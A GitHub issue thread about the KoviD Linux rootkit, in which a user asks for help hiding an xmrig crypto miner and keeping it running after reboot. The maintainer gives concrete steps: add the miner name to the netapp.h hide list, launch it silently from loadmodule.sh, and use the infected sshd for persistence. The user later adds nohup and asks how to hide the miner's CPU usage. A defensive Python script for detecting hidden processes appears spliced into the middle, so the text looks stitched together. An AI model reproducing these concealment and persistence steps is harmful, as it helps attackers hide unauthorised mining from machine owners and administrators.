Closed charlesmigel closed 7 months ago
I get this problem:
```
root@Ubuntu-2004:~/KoviD# sudo insmod ./kovid.ko
root@Ubuntu-2004:~/KoviD# cd volundr/
root@Ubuntu-2004:~/KoviD/volundr# ./install.sh /usr/sbin/sshd
-bash: ./install.sh: No such file or directory
root@Ubuntu-2004:~/KoviD/volundr# cd ..
root@Ubuntu-2004:~/KoviD# cd scripts/
root@Ubuntu-2004:~/KoviD/scripts# ./install.sh /usr/sbin/sshd
Error: KoviD not running
Use: [override variables] ./install.sh
    override defaults: VOLUNDR, KOVID, LOADER
    VOLUNDR: point to Volundr directory entry point
        default: ../volundr
    KOVID: point to KoviD module
        default: ../kovid
    LOADER: point to loader script
        default: ../loadmodule.sh
Examples:
    # ./install.sh /usr/sbin/sshd
    # VOLUNDR=/tmp/Volundr ./install.sh /usr/sbin/sshd
    # KOVID=/tmp/kovid.ko LOADER=/tmp/loadmodule.sh ./install.sh /usr/sbin/sshd
    $ sudo KOVID=/root/kovid.ko ./install.sh /usr/sbin/sshd
Before running this script, make sure to:
    KoviD: build and insmod
    Volundr: build
root@Ubuntu-2004:~/KoviD/scripts# sudo ./install.sh /usr/sbin/sshd
Error: KoviD not running
Use: [override variables] ./install.sh
    override defaults: VOLUNDR, KOVID, LOADER
    VOLUNDR: point to Volundr directory entry point
        default: ../volundr
    KOVID: point to KoviD module
        default: ../kovid
    LOADER: point to loader script
        default: ../loadmodule.sh
Examples:
    # ./install.sh /usr/sbin/sshd
    # VOLUNDR=/tmp/Volundr ./install.sh /usr/sbin/sshd
    # KOVID=/tmp/kovid.ko LOADER=/tmp/loadmodule.sh ./install.sh /usr/sbin/sshd
    $ sudo KOVID=/root/kovid.ko ./install.sh /usr/sbin/sshd
Before running this script, make sure to:
    KoviD: build and insmod
    Volundr: build
root@Ubuntu-2004:~/KoviD/scripts# lsmod | grep kovid
kovid                  57344  0
root@Ubuntu-2004:~/KoviD/scripts#
```

Here, check:

```
[  991.632130] hide [0000000002971b70] irq/100_pciehp : 2501
[  991.632133] addname '.kovid' ro=1
[  991.632134] addname 'kovid' ro=1
[  991.632135] addname '.kv.ko' ro=1
[  991.632136] addname '.lm.sh' ro=1
[  991.632138] addname '.sshd_orig' ro=1
[  991.632139] addname 'whitenose' ro=1
[  991.632140] addname 'pinknose' ro=1
[  991.632141] addname 'rednose' ro=1
[  991.632142] addname 'greynose' ro=1
[  991.632143] addname 'purplenose' ro=1
[  991.632145] addname 'blacknose' ro=1
[  991.632146] addname 'bluenose' ro=1
[  991.632415] kovid loaded.
```
Hi @charlesmigel I will check this myself later, but just to be sure, have you followed what I do here: https://github.com/carloslack/kv-demos/tree/master?tab=readme-ov-file#simple-persistence-using-elf-infection-with-volundr ?
I fixed it. In install.sh it's /proc/kovid; I changed it to mine, /proc/my name, and then it worked.
But one more question: if I were to have a startup on Kovid and it starts, but after a reboot for instance, how do I still keep my crypto miner hidden?
If I were to utilize the Volundr project for this, could you provide some examples of how to do it?
startup
In this example you only need to manually insmod kovid.ko before running install.sh. After that, if the system is rebooted, kovid will be automatically loaded when (again, in the example) the sshd daemon is started, which happens right after boot.
Another point is that this volundr example works by modifying the daemon binary, so it could easily be discovered by a simple checksum tool check. As stated in the README, this is just an example; you are free to look for other, stealthier mechanisms to enable persistence.
Yes, the startup is working now.
But what about this?
> But one more question: if I were to have a startup on Kovid and it starts, but after a reboot for instance, how do I still keep my crypto miner hidden?
> If I were to utilize the Volundr project for this, could you provide some examples of how to do it?
You can modify the script in any way you want; the only thing kovid will do is load the script. Make sure you redirect all output (including stderr) to /dev/null.
Another option, probably cleaner, is to add the process name you want to be hidden every time kovid is loaded, here: https://github.com/carloslack/KoviD/blob/master/src/netapp.h
Where should I write this? Or can you make the changes for me?
Thanks
I'm new to all this, brother.
Just edit netapp.h to include the name of the processes you want to hide. Suppose your miner is called "miner":

```c
static const char *netapp_list[] = {
    "whitenose", "pinknose", "rednose", "blacknose",
    "greynose", "purplenose", "bluenose", "miner", NULL };
```

Recompile kovid after that.
Oh okay, will check that.
I get this problem now: the CPU usage is wrong, check this:
```
top - 13:13:01 up 12:29,  3 users,  load average: 4.00, 3.73, 2.68
Tasks: 104 total,   1 running, 100 sleeping,   0 stopped,   3 zombie
%Cpu(s): 99.5 us,  0.2 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.3 si,  0.0 st
MiB Mem :   5921.9 total,   2708.2 free,   2565.0 used,    648.7 buff/cache
MiB Swap:      0.0 total,      0.0 free,      0.0 used.   3117.0 avail Mem

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND
     14 root      20   0       0      0      0 I   0.3   0.0   2:18.69 rcu_sched
    608 root      20   0   80052   1816   1624 S   0.3   0.0   0:54.52 qemu-ga
      1 root      20   0  100792  11648   8376 S   0.0   0.2   0:06.63 systemd
      2 root      20   0       0      0      0 S   0.0   0.0   0:00.01 kthreadd
      3 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_gp
      4 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 rcu_par_gp
      5 root       0 -20       0      0      0 I   0.0   0.0   0:00.00 slub_flushw
```
I use the xmrig miner for testing.
How do I put the startup on it too? https://github.com/carloslack/KoviD/issues/84#issuecomment-2059049814
I get that with the process hidden in netapp.h, but not the startup.
There?
You may use a combination of both: 1) modify the script to load your miner as well (add the miner loading before loading kovid) and 2) add the process name to the array, so when kovid starts the miner is already running and it can be hidden by the module.
Should xmrig be running before the rootkit is running? How do I include it in the loadmodule.sh script? Can you give an example?
Yes. In loadmodule.sh, on the line before `insmod=$(which insmod)`, add:

```
xmrig >/dev/null 2>&1
```

Then add `xmrig` in netapp.h.
Recompile kovid and repeat the process.
Okay, will try it, thanks. I will let you know in a moment.
On this `xmrig >/dev/null 2>&1`, how is it going to be started up? Can I add a path into it? Or how?
Thanks.
And how do I hide/list files and directories automatically with the rootkit? Can I add it to loadmodule?
And look at this:

```c
static const char *netapp_list[] = {
    "whitenose", "pinknose", "rednose", "blacknose",
    "greynose", "purplenose", "xmrig-6.21.2", "bluenose", NULL };
```

```
[ 3915.176732] ftrace hook 14 on filldir64
[ 3915.176733] ftrace hook 15 on tty_read
[ 3915.177149] Waiting for event
[ 3915.177231] hide [0000000092bee721] irq/102_pciehp : 10196
[ 3915.177387] hide [000000006c29a161] irq/101_pciehp : 10195
[ 3915.177460] hide [0000000057825dbf] irq/100_pciehp : 10194
[ 3915.177464] addname '.kovid' ro=1
[ 3915.177466] addname 'kovid' ro=1
[ 3915.177467] addname '.kv.ko' ro=1
[ 3915.177468] addname '.lm.sh' ro=1
[ 3915.177469] addname '.sshd_orig' ro=1
[ 3915.177471] addname 'whitenose' ro=1
[ 3915.177472] addname 'pinknose' ro=1
[ 3915.177473] addname 'rednose' ro=1
[ 3915.177474] addname 'greynose' ro=1
[ 3915.177476] addname 'purplenose' ro=1
[ 3915.177477] addname 'blacknose' ro=1
[ 3915.177478] addname 'bluenose' ro=1
[ 3915.177686] kovid loaded.
```
What am I doing wrong?
Show me the output of `ps qx |grep xmrig`
It's hiding xmrig but not the xmrig folder; but the CPU usage and the process are hidden.
```
[ 5045.795106] ftrace hook 15 on tty_read
[ 5045.795619] Waiting for event
[ 5045.795709] hide [00000000966b941a] irq/102_pciehp : 11160
[ 5045.795918] hide [000000009bc1a811] irq/101_pciehp : 11159
[ 5045.795943] hide [0000000076d9d0f6] irq/100_pciehp : 11158
[ 5045.795948] addname '.kovid' ro=1
[ 5045.795950] addname 'kovid' ro=1
[ 5045.795951] addname '.kv.ko' ro=1
[ 5045.795952] addname '.lm.sh' ro=1
[ 5045.795954] addname '.sshd_orig' ro=1
[ 5045.795955] addname 'whitenose' ro=1
[ 5045.795956] addname 'pinknose' ro=1
[ 5045.795957] addname 'rednose' ro=1
[ 5045.795957] addname 'greynose' ro=1
[ 5045.795958] addname 'purplenose' ro=1
[ 5045.795959] addname 'blacknose' ro=1
[ 5045.795960] addname 'bluenose' ro=1
[ 5045.796019] kovid loaded.
```

```
root@Ubuntu-2004:~/KoviD# ps qx |grep xmrig
error: process ID list syntax error

Usage:
 ps [options]

 Try 'ps --help <simple|list|output|threads|misc|all>'
  or 'ps --help <s|l|o|t|m|a>'
 for additional help text.

For more details see ps(1).
root@Ubuntu-2004:~/KoviD# ps qx |grep xmrig
error: process ID list syntax error

Usage:
 ps [options]

 Try 'ps --help <simple|list|output|threads|misc|all>'
  or 'ps --help <s|l|o|t|m|a>'
 for additional help text.

For more details see ps(1).
root@Ubuntu-2004:~/KoviD# ps aux | grep xmrig
root     11169  0.0  0.0   8160   720 pts/1    S+   17:39   0:00 grep --color=auto xmrig
root@Ubuntu-2004:~/KoviD# cd ..
root@Ubuntu-2004:~# ls
KoviD  POP  snap  xmrig-6.21.2  xmrig-6.21.2-linux-static-x64.tar.gz
root@Ubuntu-2004:~#
```
Okay, no problem, here it is:

```
root@Ubuntu-2004:~# ps ax |grep xmrig
  11432 pts/0    S+     0:00 grep --color=auto xmrig
root@Ubuntu-2004:~# ^C
```
xmrig is either not running or it is already hidden.
If it is not running, then it could be a problem with how you changed loadmodule.sh.
If it is already hidden, that is strange, because when it is hidden you should see a log line like `Hide netapp task: <name>`.
You need to include the correct name in netapp.h too, the same name you'd see in the ps output.
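A defender-side way to tell the two cases apart ("not running" versus "already hidden"). This is an added example, not KoviD's code or anything from this thread. It assumes the hiding works at the directory-listing layer (the dmesg output above shows an ftrace hook on filldir64, the readdir path), so `/proc` omits the entry while a direct lookup of `/proc/<pid>` still succeeds; the `proc_root` and `max_pid` parameters are mine, added so the probe can be pointed at a copy or bounded.

```python
#!/usr/bin/env python3
"""Hidden-process check: compare the /proc directory listing (what ps and top
use) with direct lookups of /proc/<pid>.  Assumption: hiding is done on the
readdir path, so a listing drops the entry but a path lookup still works."""
import os


def listed_pids(proc_root="/proc"):
    """Thread-group leaders visible through a normal directory listing."""
    return {int(n) for n in os.listdir(proc_root) if n.isdigit()}


def tgid_of(pid, proc_root="/proc"):
    """Resolve a probed id to its thread-group id, or None if it does not exist.
    Threads are reachable at /proc/<tid> but are legitimately absent from the
    listing, so reporting them as hidden would be a false positive."""
    try:
        with open(os.path.join(proc_root, str(pid), "status")) as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except OSError:
        return None
    return None


def probed_pids(proc_root="/proc", max_pid=None):
    """Thread-group ids that answer a direct path lookup, bypassing readdir.
    Walks 1..pid_max (read from the kernel unless max_pid is given)."""
    if max_pid is None:
        with open(os.path.join(proc_root, "sys/kernel/pid_max")) as f:
            max_pid = int(f.read())
    found = set()
    for pid in range(1, max_pid + 1):
        tgid = tgid_of(pid, proc_root)
        if tgid is not None:
            found.add(tgid)
    return found


def hidden_pids(listed, probed):
    """Pure comparison, kept apart from the I/O so it can be checked on sets."""
    return sorted(probed - listed)


if __name__ == "__main__":
    gaps = hidden_pids(listed_pids(), probed_pids())
    for pid in gaps:
        print("pid", pid, "answers a direct lookup but is missing from /proc")
    print(len(gaps), "hidden process(es)")
```

A non-empty result means the process exists but ps and top cannot see it; an empty result with no xmrig in `ps ax` means it never started. Walking the full pid_max range takes a while in Python, so pass a smaller `max_pid` for a quick check.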
Okay, but what is this?

```
[ 5045.795105] ftrace hook 14 on filldir64
[ 5045.795106] ftrace hook 15 on tty_read
[ 5045.795619] Waiting for event
[ 5045.795709] hide [00000000966b941a] irq/102_pciehp : 11160
[ 5045.795918] hide [000000009bc1a811] irq/101_pciehp : 11159
[ 5045.795943] hide [0000000076d9d0f6] irq/100_pciehp : 11158
[ 5045.795948] addname '.kovid' ro=1
[ 5045.795950] addname 'kovid' ro=1
[ 5045.795951] addname '.kv.ko' ro=1
[ 5045.795952] addname '.lm.sh' ro=1
[ 5045.795954] addname '.sshd_orig' ro=1
[ 5045.795955] addname 'whitenose' ro=1
[ 5045.795956] addname 'pinknose' ro=1
[ 5045.795957] addname 'rednose' ro=1
[ 5045.795957] addname 'greynose' ro=1
[ 5045.795958] addname 'purplenose' ro=1
[ 5045.795959] addname 'blacknose' ro=1
[ 5045.795960] addname 'bluenose' ro=1
[ 5045.796019] kovid loaded.
```

```
[ 5045.795709] hide [00000000966b941a] irq/102_pciehp : 11160
[ 5045.795918] hide [000000009bc1a811] irq/101_pciehp : 11159
[ 5045.795943] hide [0000000076d9d0f6] irq/100_pciehp : 11158
```
I can show you the loadmodule.sh:

```
root@Ubuntu-2004:~/KoviD/src# cat loadmodule.sh
/root/xmrig-6.21.2/xmrig >/dev/null 2>&1
insmod=$(which insmod)
$insmod "$1" >/dev/null 2>&1
root@Ubuntu-2004:~/KoviD/src#
```

And I have tried `xmrig >/dev/null 2>&1` with xmrig in /usr/local/bin; it's the same.
there?
Hello, it's the startup, not the net.h. Can you test with xmrig?
I will try myself when I find some available time, I will share here my results ok?
Okay, thanks.
I have also tested the hide function on xmrig.
When you start xmrig and it uses around 80% of the CPU, and then it starts three different xmrig processes and one, for example, takes 100%, this rootkit only removes one process and hides the names of all other processes with xmrig. It doesn't hide the other two processes, which is why the CPU usage goes up to 100%.
And if you manually hide the xmrig process with 'echo 14886 >/proc/mytest', when all three are hidden, the CPU usage does not show as 100%.
Here's an example run in the terminal
And for the startup of xmrig I have fixed it; the problem is you need to put this: `nohup xmrig >/dev/null 2>&1 &`, then it's working.
When I do htop on xmrig I get more PIDs; the rootkit is hiding only 1 PID. I need to hide all PIDs, can you help??
Hi @charlesmigel I'll see if I can look at this soon
Okay, I have fixed all of the startup of xmrig; it's only the CPU usage with all PIDs. Please fix it today, I need help.
Do you have Telegram or WhatsApp I can add? For a faster response.
Not planned, good luck.